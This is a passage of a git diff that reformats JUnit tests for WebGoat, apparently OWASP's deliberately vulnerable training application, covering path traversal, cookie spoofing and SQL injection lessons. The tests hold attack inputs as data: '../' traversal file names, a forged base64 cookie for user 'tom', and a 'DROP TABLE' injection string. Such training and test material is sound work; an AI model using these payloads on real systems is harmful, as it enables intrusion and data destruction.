-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.io.File;
-
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import java.io.File;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.mockito.Mockito;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.mock.web.MockMultipartFile;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class ProfileUploadTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        Mockito.when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    Mockito.when(webSession.getCurrentLesson()).thenReturn(new PathTraversal());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    Mockito.when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    @Test
-    public void solve() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFile", "../picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void solve() throws Exception {
+    var profilePicture =
+        new MockMultipartFile(
+            "uploadedFile", "../picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
                 .file(profilePicture)
                 .param("fullName", "../John Doe"))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUpload")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().is(200))
+        .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUpload")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void attemptWithWrongDirectory() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFile", "../picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void attemptWithWrongDirectory() throws Exception {
+    var profilePicture =
+        new MockMultipartFile(
+            "uploadedFile", "../picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
                 .file(profilePicture)
                 .param("fullName", "../../" + webSession.getUserName()))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUpload")))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("Nice try")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().is(200))
+        .andExpect(jsonPath("$.assignment", CoreMatchers.equalTo("ProfileUpload")))
+        .andExpect(jsonPath("$.feedback", CoreMatchers.containsString("Nice try")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void shouldNotOverrideExistingFile() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFile", "picture.jpg", "text/plain", "an image".getBytes());
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
+  @Test
+  public void shouldNotOverrideExistingFile() throws Exception {
+    var profilePicture =
+        new MockMultipartFile("uploadedFile", "picture.jpg", "text/plain", "an image".getBytes());
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
                 .file(profilePicture)
-                .param("fullName", ".."+File.separator + webSession.getUserName()))
-                .andExpect(jsonPath("$.output", CoreMatchers.anyOf(
-                		CoreMatchers.containsString("Is a directory"),
-                		CoreMatchers.containsString("..\\\\"+ webSession.getUserName()))))
-                .andExpect(status().is(200));
-    }
+                .param("fullName", ".." + File.separator + webSession.getUserName()))
+        .andExpect(
+            jsonPath(
+                "$.output",
+                CoreMatchers.anyOf(
+                    CoreMatchers.containsString("Is a directory"),
+                    CoreMatchers.containsString("..\\\\" + webSession.getUserName()))))
+        .andExpect(status().is(200));
+  }
 
-    @Test
-    public void normalUpdate() throws Exception {
-        var profilePicture = new MockMultipartFile("uploadedFile", "picture.jpg", "text/plain", "an image".getBytes());
+  @Test
+  public void normalUpdate() throws Exception {
+    var profilePicture =
+        new MockMultipartFile("uploadedFile", "picture.jpg", "text/plain", "an image".getBytes());
 
-        mockMvc.perform(MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.multipart("/PathTraversal/profile-upload")
                 .file(profilePicture)
                 .param("fullName", "John Doe"))
-                .andExpect(status().is(200))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.containsStringIgnoringCase("PathTraversal\\"+File.separator+"unit-test\\"+File.separator+"John Doe")))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
+        .andExpect(status().is(200))
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.containsStringIgnoringCase(
+                    "PathTraversal\\"
+                        + File.separator
+                        + "unit-test\\"
+                        + File.separator
+                        + "John Doe")))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java
index e0cdf3113..80cad9d0e 100644
--- a/src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/SpoofCookieAssignmentTest.java
@@ -22,6 +22,16 @@
 
 package org.owasp.webgoat.lessons.spoofcookie;
 
+import static org.hamcrest.Matchers.emptyString;
+import static org.hamcrest.Matchers.not;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import java.util.stream.Stream;
+import javax.servlet.http.Cookie;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.DisplayName;
@@ -37,17 +47,6 @@ import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.ResultActions;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import javax.servlet.http.Cookie;
-import java.util.stream.Stream;
-
-import static org.hamcrest.Matchers.emptyString;
-import static org.hamcrest.Matchers.not;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 /***
  *
  * @author Angel Olle Blazquez
@@ -57,148 +56,150 @@ import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standal
 @ExtendWith(MockitoExtension.class)
 class SpoofCookieAssignmentTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
-    private static final String COOKIE_NAME = "spoof_auth";
-    private static final String LOGIN_CONTEXT_PATH = "/SpoofCookie/login";
-    private static final String ERASE_COOKIE_CONTEXT_PATH = "/SpoofCookie/cleanup";
+  private MockMvc mockMvc;
+  private static final String COOKIE_NAME = "spoof_auth";
+  private static final String LOGIN_CONTEXT_PATH = "/SpoofCookie/login";
+  private static final String ERASE_COOKIE_CONTEXT_PATH = "/SpoofCookie/cleanup";
 
-    @BeforeEach
-    void setup() {
-        SpoofCookieAssignment spoofCookieAssignment = new SpoofCookieAssignment();
-        init(spoofCookieAssignment);
-        mockMvc = standaloneSetup(spoofCookieAssignment).build();
-    }
+  @BeforeEach
+  void setup() {
+    SpoofCookieAssignment spoofCookieAssignment = new SpoofCookieAssignment();
+    init(spoofCookieAssignment);
+    mockMvc = standaloneSetup(spoofCookieAssignment).build();
+  }
 
-    @Test
-    @DisplayName("Lesson completed")
-    void success() throws Exception {
-        Cookie cookie = new Cookie(COOKIE_NAME, "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZDZmNzQ=");
+  @Test
+  @DisplayName("Lesson completed")
+  void success() throws Exception {
+    Cookie cookie = new Cookie(COOKIE_NAME, "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZDZmNzQ=");
 
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .cookie(cookie)
-            .param("username", "")
-            .param("password", ""));
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .cookie(cookie)
+                .param("username", "")
+                .param("password", ""));
 
-        result.andExpect(status().isOk());
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+    result.andExpect(status().isOk());
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    }
+  @Test
+  @DisplayName("Valid credentials login without authentication cookie")
+  void validLoginWithoutCookieTest() throws Exception {
+    String username = "webgoat";
+    String password = "webgoat";
 
-    @Test
-    @DisplayName("Valid credentials login without authentication cookie")
-    void validLoginWithoutCookieTest() throws Exception {
-        String username = "webgoat";
-        String password = "webgoat";
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .param("username", username)
+                .param("password", password));
 
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", username)
-            .param("password", password));
+    result.andExpect(status().isOk());
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    result.andExpect(content().contentType(MediaType.APPLICATION_JSON_VALUE));
+    result.andExpect(cookie().value(COOKIE_NAME, not(emptyString())));
+  }
 
-        result.andExpect(status().isOk());
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-        result.andExpect(content().contentType(MediaType.APPLICATION_JSON_VALUE));
-        result.andExpect(cookie().value(COOKIE_NAME, not(emptyString())));
+  @ParameterizedTest
+  @MethodSource("providedCookieValues")
+  @DisplayName(
+      "Tests different invalid/valid -but not solved- cookie flow scenarios: "
+          + "1.- Invalid encoded cookie sent. "
+          + "2.- Valid cookie login (not tom) sent. "
+          + "3.- Valid cookie with not known username sent ")
+  void cookieLoginNotSolvedFlow(String cookieValue) throws Exception {
+    Cookie cookie = new Cookie(COOKIE_NAME, cookieValue);
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .cookie(cookie)
+                .param("username", "")
+                .param("password", ""))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    }
+  @Test
+  @DisplayName("UnsatisfiedServletRequestParameterException test for missing username")
+  void invalidLoginWithUnsatisfiedServletRequestParameterExceptionOnUsernameMissing()
+      throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH).param("password", "anypassword"))
+        .andExpect(status().is4xxClientError());
+  }
 
-    @ParameterizedTest
-    @MethodSource("providedCookieValues")
-    @DisplayName("Tests different invalid/valid -but not solved- cookie flow scenarios: "
-            + "1.- Invalid encoded cookie sent. "
-            + "2.- Valid cookie login (not tom) sent. "
-            + "3.- Valid cookie with not known username sent ")
-    void cookieLoginNotSolvedFlow(String cookieValue) throws Exception {
-        Cookie cookie = new Cookie(COOKIE_NAME, cookieValue);
-        mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .cookie(cookie)
-            .param("username", "")
-            .param("password", ""))
-            .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+  @Test
+  @DisplayName("UnsatisfiedServletRequestParameterException test for missing password")
+  void invalidLoginWithUnsatisfiedServletRequestParameterExceptionOnPasswordMissing()
+      throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH).param("username", "webgoat"))
+        .andExpect(status().is4xxClientError());
+  }
 
-    @Test
-    @DisplayName("UnsatisfiedServletRequestParameterException test for missing username")
-    void invalidLoginWithUnsatisfiedServletRequestParameterExceptionOnUsernameMissing() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("password", "anypassword"))
-            .andExpect(status().is4xxClientError());
-    }
+  @Test
+  @DisplayName("Invalid blank credentials login")
+  void invalidLoginWithBlankCredentials() throws Exception {
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .param("username", "")
+                .param("password", ""));
 
-    @Test
-    @DisplayName("UnsatisfiedServletRequestParameterException test for missing password")
-    void invalidLoginWithUnsatisfiedServletRequestParameterExceptionOnPasswordMissing() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", "webgoat"))
-            .andExpect(status().is4xxClientError());
-    }
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    @DisplayName("Invalid blank credentials login")
-    void invalidLoginWithBlankCredentials() throws Exception {
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", "")
-            .param("password", ""));
+  @Test
+  @DisplayName("Invalid blank password login")
+  void invalidLoginWithBlankPassword() throws Exception {
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .param("username", "webgoat")
+                .param("password", ""));
 
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    }
+  @Test
+  @DisplayName("cheater test")
+  void cheat() throws Exception {
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .param("username", "tom")
+                .param("password", "apasswordfortom"));
 
-    @Test
-    @DisplayName("Invalid blank password login")
-    void invalidLoginWithBlankPassword() throws Exception {
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", "webgoat")
-            .param("password", ""));
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  @Test
+  @DisplayName("Invalid login with tom username")
+  void invalidTomLogin() throws Exception {
+    ResultActions result =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post(LOGIN_CONTEXT_PATH)
+                .param("username", "tom")
+                .param("password", ""));
 
-    }
+    result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    @DisplayName("cheater test")
-    void cheat() throws Exception {
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", "tom")
-            .param("password", "apasswordfortom"));
-
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
-    @Test
-    @DisplayName("Invalid login with tom username")
-    void invalidTomLogin() throws Exception {
-        ResultActions result = mockMvc.perform(MockMvcRequestBuilders
-            .post(LOGIN_CONTEXT_PATH)
-            .param("username", "tom")
-            .param("password", ""));
-
-        result.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
-    @Test
-    @DisplayName("Erase authentication cookie")
-    void eraseAuthenticationCookie() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders
-            .get(ERASE_COOKIE_CONTEXT_PATH))
-            .andExpect(status().isOk())
-            .andExpect(cookie().maxAge(COOKIE_NAME, 0))
-            .andExpect(cookie().value(COOKIE_NAME, ""));
-
-    }
-
-    private static Stream<Arguments> providedCookieValues() {
-        return Stream.of(
-            Arguments.of("NjI2MTcwNGI3YTQxNGE1OTUNzQ2ZDZmNzQ="),
-            Arguments.of("NjI2MTcwNGI3YTQxNGE1OTU2NzQ3NDYxNmY2NzYyNjU3Nw=="),
-            Arguments.of("NmQ0NjQ1Njc0NjY4NGY2Mjc0NjQ2YzY1Njc2ZTYx"));
-    }
+  @Test
+  @DisplayName("Erase authentication cookie")
+  void eraseAuthenticationCookie() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.get(ERASE_COOKIE_CONTEXT_PATH))
+        .andExpect(status().isOk())
+        .andExpect(cookie().maxAge(COOKIE_NAME, 0))
+        .andExpect(cookie().value(COOKIE_NAME, ""));
+  }
 
+  private static Stream<Arguments> providedCookieValues() {
+    return Stream.of(
+        Arguments.of("NjI2MTcwNGI3YTQxNGE1OTUNzQ2ZDZmNzQ="),
+        Arguments.of("NjI2MTcwNGI3YTQxNGE1OTU2NzQ3NDYxNmY2NzYyNjU3Nw=="),
+        Arguments.of("NmQ0NjQ1Njc0NjY4NGY2Mjc0NjQ2YzY1Njc2ZTYx"));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java
index f2c9e4a4d..69d7df255 100644
--- a/src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/spoofcookie/encoders/EncDecTest.java
@@ -28,13 +28,11 @@ import static org.junit.jupiter.api.Assertions.assertNull;
 import static org.junit.jupiter.api.Assertions.assertTrue;
 
 import java.util.stream.Stream;
-
 import org.junit.jupiter.api.DisplayName;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.Arguments;
 import org.junit.jupiter.params.provider.MethodSource;
-import org.owasp.webgoat.lessons.spoofcookie.encoders.EncDec;
 
 /***
  *
@@ -44,47 +42,47 @@ import org.owasp.webgoat.lessons.spoofcookie.encoders.EncDec;
 
 class EncDecTest {
 
-    @ParameterizedTest
-    @DisplayName("Encode test")
-    @MethodSource("providedForEncValues")
-    void testEncode(String decoded, String encoded) {
-        String result = EncDec.encode(decoded);
+  @ParameterizedTest
+  @DisplayName("Encode test")
+  @MethodSource("providedForEncValues")
+  void testEncode(String decoded, String encoded) {
+    String result = EncDec.encode(decoded);
 
-        assertTrue(result.endsWith(encoded));
-    }
+    assertTrue(result.endsWith(encoded));
+  }
 
-    @ParameterizedTest
-    @DisplayName("Decode test")
-    @MethodSource("providedForDecValues")
-    void testDecode(String decoded, String encoded) {
-        String result = EncDec.decode(encoded);
+  @ParameterizedTest
+  @DisplayName("Decode test")
+  @MethodSource("providedForDecValues")
+  void testDecode(String decoded, String encoded) {
+    String result = EncDec.decode(encoded);
 
-        assertThat(decoded, is(result));
-    }
+    assertThat(decoded, is(result));
+  }
 
-    @Test
-    @DisplayName("null encode test")
-    void testNullEncode() {
-        assertNull(EncDec.encode(null));
-    }
+  @Test
+  @DisplayName("null encode test")
+  void testNullEncode() {
+    assertNull(EncDec.encode(null));
+  }
 
-    @Test
-    @DisplayName("null decode test")
-    void testNullDecode() {
-        assertNull(EncDec.decode(null));
-    }
+  @Test
+  @DisplayName("null decode test")
+  void testNullDecode() {
+    assertNull(EncDec.decode(null));
+  }
 
-    private static Stream<Arguments> providedForEncValues() {
-        return Stream.of(
-            Arguments.of("webgoat", "YxNmY2NzYyNjU3Nw=="),
-            Arguments.of("admin", "2ZTY5NmQ2NDYx"),
-            Arguments.of("tom", "2ZDZmNzQ="));
-    }
+  private static Stream<Arguments> providedForEncValues() {
+    return Stream.of(
+        Arguments.of("webgoat", "YxNmY2NzYyNjU3Nw=="),
+        Arguments.of("admin", "2ZTY5NmQ2NDYx"),
+        Arguments.of("tom", "2ZDZmNzQ="));
+  }
 
-    private static Stream<Arguments> providedForDecValues() {
-        return Stream.of(
-            Arguments.of("webgoat", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ3NDYxNmY2NzYyNjU3Nw=="),
-            Arguments.of("admin", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZTY5NmQ2NDYx"),
-            Arguments.of("tom", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZDZmNzQ="));
-    }
+  private static Stream<Arguments> providedForDecValues() {
+    return Stream.of(
+        Arguments.of("webgoat", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ3NDYxNmY2NzYyNjU3Nw=="),
+        Arguments.of("admin", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZTY5NmQ2NDYx"),
+        Arguments.of("tom", "NjI2MTcwNGI3YTQxNGE1OTU2NzQ2ZDZmNzQ="));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java
index c14ac348c..b63767042 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/SqlLessonTest.java
@@ -22,21 +22,18 @@
 
 package org.owasp.webgoat.lessons.sqlinjection;
 
+import static org.mockito.Mockito.when;
+
 import org.junit.jupiter.api.BeforeEach;
 import org.owasp.webgoat.container.plugins.LessonTest;
 import org.owasp.webgoat.lessons.sqlinjection.introduction.SqlInjection;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.Mockito.when;
-
 public class SqlLessonTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new SqlInjection());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
-
-
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new SqlInjection());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java
index 9187aed6c..8bb4444e2 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10Test.java
@@ -22,52 +22,49 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.CoreMatchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 /**
  * @author Benedikt Stuhrmann
  * @since 11/07/18.
  */
 public class SqlInjectionLesson10Test extends SqlLessonTest {
 
-    private String completedError = "JSON path \"lessonCompleted\"";
+  private String completedError = "JSON path \"lessonCompleted\"";
 
-    @Test
-    public void tableExistsIsFailure() throws Exception {
-        try {
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack10")
-                    .param("action_string", ""))
+  @Test
+  public void tableExistsIsFailure() throws Exception {
+    try {
+      mockMvc
+          .perform(MockMvcRequestBuilders.post("/SqlInjection/attack10").param("action_string", ""))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(false)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.entries"))));
+    } catch (AssertionError e) {
+      if (!e.getMessage().contains(completedError)) throw e;
 
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(false)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.entries"))));
-        } catch (AssertionError e) {
-            if (!e.getMessage().contains(completedError)) throw e;
-
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack10")
-                    .param("action_string", ""))
-
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(true)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.success"))));
-        }
+      mockMvc
+          .perform(MockMvcRequestBuilders.post("/SqlInjection/attack10").param("action_string", ""))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(true)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.success"))));
     }
+  }
 
-    @Test
-    public void tableMissingIsSuccess() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack10")
+  @Test
+  public void tableMissingIsSuccess() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack10")
                 .param("action_string", "%'; DROP TABLE access_log;--"))
-
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.success"))));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.10.success"))));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java
index 010be19f3..c71cc2d6c 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2Test.java
@@ -22,23 +22,23 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlInjectionLesson2Test extends SqlLessonTest {
 
-    @Test
-    public void solution() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack2")
+  @Test
+  public void solution() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack2")
                 .param("query", "SELECT department FROM employees WHERE userid=96134;"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java
index 43f08cbb3..3dcaafbc8 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5Test.java
@@ -22,52 +22,57 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.AfterEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.container.LessonDataSource;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
-import java.sql.SQLException;
-
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import java.sql.SQLException;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.AfterEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlInjectionLesson5Test extends SqlLessonTest {
 
-    @Autowired
-    private LessonDataSource dataSource;
+  @Autowired private LessonDataSource dataSource;
 
-    @AfterEach
-    public void removeGrant() throws SQLException {
-        dataSource.getConnection().prepareStatement("revoke select on grant_rights from unauthorized_user cascade").execute();
